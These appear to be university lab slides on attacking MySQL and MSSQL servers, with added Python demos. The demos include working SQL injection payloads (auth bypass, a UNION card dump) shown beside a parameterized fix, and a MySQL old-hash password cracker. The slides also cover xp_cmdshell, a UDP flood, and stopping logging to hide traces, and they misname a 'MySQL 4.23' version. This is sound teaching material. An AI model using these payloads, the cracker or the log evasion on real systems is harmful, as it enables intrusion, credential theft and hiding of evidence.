Databases - ECE Users Pages


Databases
Kevin Wright
Ben Bruckner
Group 40

Outline
- Background
- Vulnerabilities
- Log File Cleaning
- This Lab

Background: Databases
- Store very large volumes of information
  - Credit card numbers
  - Names
  - Dates
- Database servers make this information available on the internet
  - Retail sites can remember your billing and shipping information
  - Allows web surfers to browse through all of a company's products online
Background: SQL Servers
- Group data into tables and tables into databases
- Database servers are generally not connected directly to the internet, but rather are connected to web servers
- SQL = Structured Query Language, which can be used to create, delete, modify, or query data in a database

Typical Database Server Setup
- User's machine -> internet -> company's internet (web) server -> company's database server
- The web server faces the internet, so it gets lots of security attention
- The database server sits behind it and typically gets not much security: it trusts connections that arrive from the web server
- That trust is what attacks against the database tier ride on: password cracking, buffer overflows, SQL injection, weak default settings, etc.
Different Databases
- MySQL 4.23
  - http://www.mysql.com
  - "The world's most popular open source database"
  - Runs on Windows and a wide variety of Unix operating systems, including Mac OS X
  - Since it is open source, we can use it for free
- Microsoft SQL Server 2000
  - Very popular (because it's Microsoft)
  - Has a "more user friendly" GUI than MySQL
  - In the lab, we will actually be using a free trial version because the full version costs between $1,000 and $20,000 per machine
- Other databases include Oracle, IBM DB2, Sybase, etc.
Using a Database Server
- The database server is set up on a computer and acts much like a web server
  - MySQL listens on TCP port 3306
  - MSSQL listens on TCP port 1433 (the database engine) and UDP port 1434 (the SQL Server Resolution Service, which tells clients which port a named instance is listening on)
- Other computers can connect remotely to this database server and access information
- Access privileges are controlled with usernames and passwords, much like in Unix
- Numerous exploits exist that grant root access (thus allowing the attacker to access everything stored in the database) or crash the database server
MySQL Vulnerabilities
- Countless buffer overflow vulnerabilities allow attacker-supplied code to run with the privileges of the mysqld process (which is root if the server was started as root rather than as a dedicated unprivileged account) or can be used in DoS attacks
- Password authentication is weak and can be exploited so that a user can log on as someone else (sometimes root)
- There are several ways for someone with a user account to gain root privileges just by using the right combination of commands
- Many others...
MSSQL Vulnerabilities
- The target of many worms, such as SQLSnake and SQL Slammer
- Many of the default settings are exploitable (such as leaving the system administrator (sa) account's password blank, which is exactly what SQLSnake scanned for)
- Again, buffer overflow vulnerabilities are abundant
- Many others...
- It is essential to be diligent about downloading the newest patches for MSSQL (and all other Microsoft products)
Other Vulnerabilities
- SQL Injection
  - A database that is linked to a website via a form
  - SQL commands are entered into the form fields, and the web application pastes them into its own query text, so the attacker's input becomes part of the SQL that runs
- ODBC (Open Database Connectivity)
- JDBC (Java Database Connectivity)
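The form-field SQL injection described above, as an added example that is not part of the original slides: a login check written the way a naive web handler would write it, run against an in-memory SQLite database, next to the parameterized version that closes the hole. The table, the two users, the card numbers and the attacker's form inputs are all constructed here for the demonstration.

```python
"""Added example (not from the original slides): form-field SQL injection
against a constructed in-memory SQLite users table, with the vulnerable
query beside its parameterized fix."""
import sqlite3


def make_db():
    """Constructed sample data: the kind of table a retail site keeps."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, card TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hunter2", "4111-1111-1111-1111"),
         ("bob", "letmein", "5500-0000-0000-0004")],
    )
    return conn


def rows_vulnerable(conn, username, password):
    """The bug from the slide: the form fields are pasted straight into the
    SQL text, so quote characters and comments in the input become syntax.
    Returns the first column of every row the resulting query produces."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [r[0] for r in conn.execute(sql).fetchall()]


def login_vulnerable(conn, username, password):
    """Naive login: 'logged in as' the first matching row, or None."""
    rows = rows_vulnerable(conn, username, password)
    return rows[0] if rows else None


def login_fixed(conn, username, password):
    """Same query with bound parameters.  The driver sends the values
    separately from the SQL text, so the input can never change the query
    shape; a quote in the username is compared as a literal character."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    # Attacker's username field; the password field can be anything.
    # The trailing "--" comments out the rest of the WHERE clause.
    bypass = "' OR 1=1 --"
    # A UNION payload turns the login query into a card-number dump.
    dump = "' UNION SELECT card FROM users --"
    return {
        "honest login": login_vulnerable(conn, "alice", "hunter2"),
        "bypass (vulnerable)": login_vulnerable(conn, bypass, "x"),
        "bypass (fixed)": login_fixed(conn, bypass, "x"),
        "card dump (vulnerable)": rows_vulnerable(conn, dump, "x"),
        "card dump (fixed)": login_fixed(conn, dump, "x"),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print("%-24s %r" % (label, result))
```

The fix is not quoting or escaping the input by hand; it is keeping data out of the query text altogether, which is what the `?` placeholders do. The same discipline applies to ODBC and JDBC code (prepared statements with bound parameters).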

Log File Editing
- Most, if not all, servers keep a log of all of the transactions that take place
- A perfect attack would be one which left no evidence of anything ever occurring
- Much of the evidence that can be used to track down the attacker is in the server logs
- In the lab, you will halt the logging function before you do anything malicious so that no trace is left behind
  - Note that everything up to and including the act of stopping the logger is still recorded, and logs that are copied to a separate host as they are written cannot be cleaned from the database server at all
MySQL Exploits Used in This Lab
- Password busting
  - Run a simple script that brute-forces the root account's password: hash each candidate the way MySQL does and compare it with the hash stored in mysql.user (the stored hash cannot be "decrypted"; the password has to be guessed)
- Privilege Escalation
  - Start with user access
  - Using only SQL commands, gain root access
- Denial of Service
  - Remotely shut the server down by flooding port 3306 with UDP traffic
  - mysqld listens on TCP 3306, so a UDP flood is a bandwidth and host-level flood rather than an attack on the MySQL protocol itself
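What the "password busting" script on the slide does, as an added example that is not part of the original slides: MySQL 4.0 and earlier store each account's password in mysql.user as the 16-hex-digit value produced by the server's original hash_password() routine (the PASSWORD() function before 4.1, OLD_PASSWORD() afterwards). The routine is re-implemented here in Python, and a small cracker hashes each wordlist candidate, plus a few common manglings, until one matches. The wordlist and the "stored" hash are constructed for the demo (the hash is computed from a chosen password rather than copied from a real server).

```python
"""Added example (not from the original slides): brute-forcing a MySQL
pre-4.1 password hash by re-hashing wordlist candidates and comparing."""

MASK32 = 0xFFFFFFFF


def mysql_old_hash(password: str) -> str:
    """Re-implementation of MySQL's pre-4.1 hash_password(): two 31-bit
    words printed as 16 lowercase hex digits.  Spaces and tabs are skipped,
    as in the original C code; the arithmetic is done modulo 2**32."""
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password.encode("utf-8"):   # bytes as the client would send them
        if ch in (0x20, 0x09):
            continue
        nr ^= ((((nr & 63) + add) * ch) + (nr << 8)) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += ch
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def candidates(wordlist):
    """Each word as-is, capitalized, upper-cased, and with a two-digit suffix:
    the cheap manglings that recover most weak passwords."""
    for word in wordlist:
        yield word
        yield word.capitalize()
        yield word.upper()
        for n in range(100):
            yield word + str(n)


def brute_force(stored_hash: str, wordlist):
    """Return the password whose hash equals stored_hash, or None.
    The hash itself cannot be reversed; this is pure guess-and-check."""
    target = stored_hash.strip().lower()
    for guess in candidates(wordlist):
        if mysql_old_hash(guess) == target:
            return guess
    return None


if __name__ == "__main__":
    # Constructed demo: pretend this hash was read from mysql.user for root.
    stored = mysql_old_hash("root42")
    wordlist = ["password", "admin", "root", "mysql"]
    print("stored hash:", stored)
    print("recovered:  ", brute_force(stored, wordlist))
```

Because the hash takes no salt, the same password always hashes to the same value, so a table of precomputed hashes for a large wordlist works as well as live guessing; that, and the 62-bit output, is why MySQL 4.1 replaced this scheme.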
MSSQL Exploits Used in This Lab
- Password
- XP_CMDSHELL
  - The MSSQL extended stored procedure xp_cmdshell runs a Windows command through cmd.exe from inside SQL and returns its output as rows
  - If we gain access to a Windows command shell, we gain access to the server: the command runs with the privileges of the SQL Server service account (in SQL Server 2000 the procedure is available to sysadmin logins by default; later versions ship with it disabled)
- Slammer Worm
  - The worm was widely circulated and targeted a buffer overflow vulnerability in MSSQL Server 2000 (in the SQL Server Resolution Service on UDP port 1434; Microsoft had released the patch, MS02-039, about six months earlier) that was used in a Denial of Service (DoS) attack: the worm's own scanning traffic saturated networks
Lab Overview
- Machines running MySQL server and MSSQL server have been set up by the TAs
- You must gain access to these machines to run the aforementioned exploits on the servers
- The exploits will either shut the servers down or give you access to sensitive information
- Explore how to disable the logger to cover your tracks